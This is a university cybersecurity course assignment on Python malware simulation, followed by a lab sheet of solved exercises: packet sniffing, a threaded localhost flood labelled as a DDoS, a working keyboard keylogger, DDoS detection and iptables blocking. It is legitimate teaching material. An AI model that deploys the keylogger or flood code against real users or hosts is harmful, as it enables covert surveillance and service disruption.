0% found this document useful (0 votes)
15 views9 pages

Assignment#1 (1)

The document outlines an assignment for a cybersecurity course focusing on Python-based malware simulation. Students are required to select a type of malware, analyze its impact, and propose mitigation strategies while collaborating in groups. The assignment includes ethical considerations, detailed requirements, and a grading rubric, emphasizing the importance of research and effective presentation skills.

Uploaded by

anas almamary
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
15 views9 pages

Assignment#1 (1)

The document outlines an assignment for a cybersecurity course focusing on Python-based malware simulation. Students are required to select a type of malware, analyze its impact, and propose mitigation strategies while collaborating in groups. The assignment includes ethical considerations, detailed requirements, and a grading rubric, emphasizing the importance of research and effective presentation skills.

Uploaded by

anas almamary
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

Cybersecurity Design Principles

CYB 131

Assignment #1

Python-Based Malware Simulation


Overview:
Malware, or malicious software, is a critical threat to information systems worldwide. This
assignment focuses on understanding one type of malware in detail. As a group, students
will explore and analyze the chosen malware, its techniques, intent, and how organizations
can mitigate its impact. This assignment aims to enhance your practice in explaining the
impact of the selected malware type on the system, Analyze the cybersecurity design
principles required to protect the system from the malware, and presentation skills while
providing a comprehensive understanding of malware threats in the field of cybersecurity.

Ethical Disclaimer

This guide and attached examples to apply are strictly for educational and research purposes.
Any created malware is illegal if used maliciously. Ensure that you practice this in a controlled
environment on your own system. Unauthorized use violates cybersecurity laws.

Assignment Requirements:
1. Select a Malware Type: Choose one specific type of malware (e.g., DDoS Attack,
Keylogging, ransomware, spyware, Trojan horse, etc.).

2. Malware Overview (200-300 words):


- Define the selected malware, including its name and brief history.
- Explain the primary aim of this malware. What does it target? And how does it impact the
system? (e.g., data theft, system disruption, espionage).

3. Applying (150-200 words):

- Write a Python script for simulating the selected malware


- Discuss the step-by-step guidance for simulating the selected malware techniques and
methods this malware uses to infiltrate systems based on how did you apply it. (e.g.,
phishing, exploiting vulnerabilities, file-less attacks).
4. Intent and Impact (100-150 words):
- Describe the intent behind the malware. What are the possible consequences if a system is
infected?
- Include real-world examples or cases where this malware caused significant damage.

5. Best Practices to Minimize Effect (200-300 words):


- Identify and explain best practices to protect systems and data from this type of malware.
- Include both technical solutions (e.g., firewalls, antivirus, encryption) and non-technical
measures (e.g., user education, access controls).
- Suggest how AI can assist in detecting and preventing this malware (e.g., anomaly
detection using machine learning).

6. References: Include at least 3-5 credible sources that provide information about the
selected malware, using proper citation formats.

Assignment Details:
• Group Work: The assignment should be completed in groups of 3-4 students.
• Length: The report should be 500-700 words in length, not including references.
• Use of AI: Students are encouraged to use AI tools to gather information and enhance
their research. Mention how AI tools contributed to the analysis and what additional
insights were gained through their use.
• Presentation: Present the findings in a clear, structured, and professional manner. Use
headings and subheadings for each section.

Submission Guidelines:
• Deadline: 15 October 2024
• Format: Submit the assignment as a PDF document via blackboard
• Structure: Include a cover page with the group members' names, student IDs, and the
assignment title. Use consistent formatting (e.g., font size 12, Times New Roman, 1.5 line
spacing).

Grading Rubric (Total: 20 Marks):


1. Selection of Malware and Overview (2 marks):
- Clearly identifies a specific malware type.
- Provides an accurate and detailed overview of the malware’s name, history, and aim.

2. Applying the selected Malware (8 marks):


- The Python script for simulating the selected malware.
- Discusses the step-by-step guidance for simulating the selected malware.

3. Intent and Impact (2 marks):


- Clearly describes the malware's intent and the potential impact of an infection.
- Provides relevant examples or case studies to support the analysis.
4. Best Practices to Minimize Effects (2 marks):
- Suggests comprehensive strategies and solutions to mitigate the malware's effects.
- Explores the role of AI in detection and prevention effectively.

5. Use of AI Tools and References (2 marks):


- Describes the use of AI tools in performing the research process.
- Includes at least 3-5 credible references, properly cited.

6. Presentation (4 marks):
- Present the findings about the selected malware in a clear, structured, and professional
manner. Use headings and subheadings for each section.

- Present the screen shots for the created Python script for simulating the selected malware
in a clear, structured based on step-by–step describing how did you the malware
performed.

Criteria for Grading:


• Clarity and Depth: The assignment should provide clear explanations with a good depth of
analysis. It should demonstrate a thorough understanding of the malware topic.
• Research Quality: Use of recent and credible sources, including scholarly articles, industry
reports, or news outlets. Usage of AI for analysis will add value.
• Originality: The content must be original and well-crafted, reflecting the group's own
understanding and insights.
• Professionalism: The report should be well-organized, with a logical flow and professional
presentation.

Note:
Focus on collaborating effectively within your group to divide the workload. Explore how AI
tools can aid in your research and provide a unique perspective on the selected malware.
Your detailed analysis, along with current updates, will help deepen your understanding of
cybersecurity threats and defense strategies.

Grading Rubric (Total: 20 Marks):


Criteria Excellent (Full Good Satisfactory Needs
Marks) Improvement
Selection of Clear identification of Identified Malware identified, but Poor or
Malware specific malware malware with overview lacks depth. unclear
and with detailed adequate identification
Overview (2 overview and aim. overview and of malware
marks) aim. with
inadequate
overview.
Applying Thorough Adequate Basic explanation of Insufficient or
Python explanation of explanation techniques, lacks clarity unclear
script for techniques, methods, of techniques or detail. explanation of
simulating and methods techniques.
the selected and spread with some
malware (8 mechanism. gaps.
marks)
Intent and Clearly describes Describes Describes intent but Poor
Impact (2 intent and impact intent and lacks impact analysis. description of
marks) with relevant impact with intent and
examples. limited impact, lacks
examples. examples.
Comprehensive Adequate Basic strategies, minimal Incomplete
Best strategies and strategies exploration of AI role. strategies, no
Practices to solutions, effectively with some mention of AI
Minimize explores AI role. mention of AI role.
Effects (2 role.
marks)
Use of AI Effectively describes
Describes AI Limited AI tool usage Poor or no
Tools and AI tool usage, tool usage, description, few mention of AI
References includes 3-5 credible
includes references. tool usage,
(2 marks) references. references lacks
with minor references.
gaps.
Presentation Demonstrates Covers the Provides general Lacks depth,
(4 marks) the content in topic well knowledge, but lacks organization,
depth, with a well- with some depth or strong and
organized flow, depth and organization. engagement.
keeping engagement a clear Engagement with the The
& interaction with organization, audience is minimal, and presentation
the audience, and though a few the presentation may is difficult to
managing time minor areas feel follow, with
effectively. Speaker may lack somewhat disconnected limited
presents confidently, detail. or unclear. Time interaction
uses relevant Engages the management needs with the
examples, and audience at improvement, with some audience.
maintains audience times but parts feeling rushed or Speaker
interest throughout. could too slow. struggles with
improve confidence or
interaction. clarity,
Time and time
management management
is mostly is poor,
effective, with leading to a
slight presentation
variations in that is too
pacing. short, too
long, or
unbalanced.
CYB 131
Cybersecurity Design Principles

Lab 3
Objective

To practice botnet simulation, attack detection, and mitigation using Python Pycharm,
with step-by-step guidance.

Exercise 1: Packet Sniffing

Task:

Write a Python script to capture and print network packets using Scapy.

• Filter for TCP traffic on port 80.


• Capture only 10 packets.

Instructions:

1. Install Scapy using pip install scapy.


2. Run the script below.
3. Open a web browser and visit a website.
4. Observe the captured packets.

# Solution for Exercise 1: Packet Sniffing


from scapy.all import sniff

def packet_callback(packet):
print(packet.summary())

sniff(filter="tcp port 80", prn=packet_callback, count=10)

Exercise 2: Simulating a Simple DDoS Attack

Task:

Write a script to simulate multiple HTTP requests to a local server.

• Use Python sockets.


• Send 100 requests to 127.0.0.1:80.
Beginner Instructions:

1. Ensure you have a local web server running.


o Install Flask using pip install flask.
o Create a simple Flask server:

from flask import Flask


app = Flask(__name__)

@app.route('/')
def home():
return "Server is running!"

if __name__ == "__main__":
app.run(host='127.0.0.1', port=80)

o Run the Flask script in a separate terminal.


2. Run the DDoS simulation script below.
3. Observe the requests being logged by the server.

# Solution for Exercise 2: DDoS Simulation


import socket
import threading

def attack(target, port):


client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
client.connect((target, port))
client.send(b"GET / HTTP/1.1\r\n")
client.close()
except:
pass

target_ip = "127.0.0.1"
target_port = 80

threads = []
for i in range(100):
thread = threading.Thread(target=attack, args=(target_ip,
target_port))
threads.append(thread)
thread.start()

Exercise 3: Keylogging Simulation

Task:

Write a keylogger script that:

• Records keystrokes.
• Saves them to a file keylog.txt.
Beginner Instructions:

1. Install keyboard using pip install keyboard.


2. Run the script below.
3. Open a text editor and type anything.
4. Press Ctrl + C in the terminal to stop the script.
5. Open keylog.txt to see recorded keystrokes.

# Solution for Exercise 3: Keylogging


import keyboard

def keylogger():
with open("keylog.txt", "a") as log:
while True:
event = keyboard.read_event()
if event.event_type == keyboard.KEY_DOWN:
log.write(event.name + "\n")

keylogger()

Exercise 4: Detecting DDoS Attempts

Task:

Modify the detection script to:

• Monitor incoming requests.


• Print a warning if an IP makes more than 10 requests.

Beginner Instructions:

1. Run the Flask server from Exercise 2.


2. Simulate multiple requests using the DDoS attack script.
3. Run the detection script below.
4. Observe if an IP gets flagged for too many requests.

# Solution for Exercise 4: DDoS Detection


from collections import defaultdict
import time

request_counts = defaultdict(int)

def detect_ddos(ip):
request_counts[ip] += 1
if request_counts[ip] > 10:
print(f"Potential DDoS attack detected from {ip}!")

# Simulate requests
for i in range(12):
detect_ddos("192.168.1.1")
Exercise 5: Blocking Malicious IPs

Task:

Write a Python function to:

• Block an IP using iptables.


• Print confirmation.

Beginner Instructions:

1. Identify an attacking IP from Exercise 4.


2. Run the script below.
3. Verify that the IP is blocked using sudo iptables -L (Linux only).

# Solution for Exercise 5: Blocking IP


import os

def block_ip(ip):
os.system(f"sudo iptables -A INPUT -s {ip} -j DROP")
print(f"Blocked {ip}")

block_ip("192.168.1.1")

Note: iptables only works on Linux. If using Windows, manually block the IP in
firewall settings.

You might also like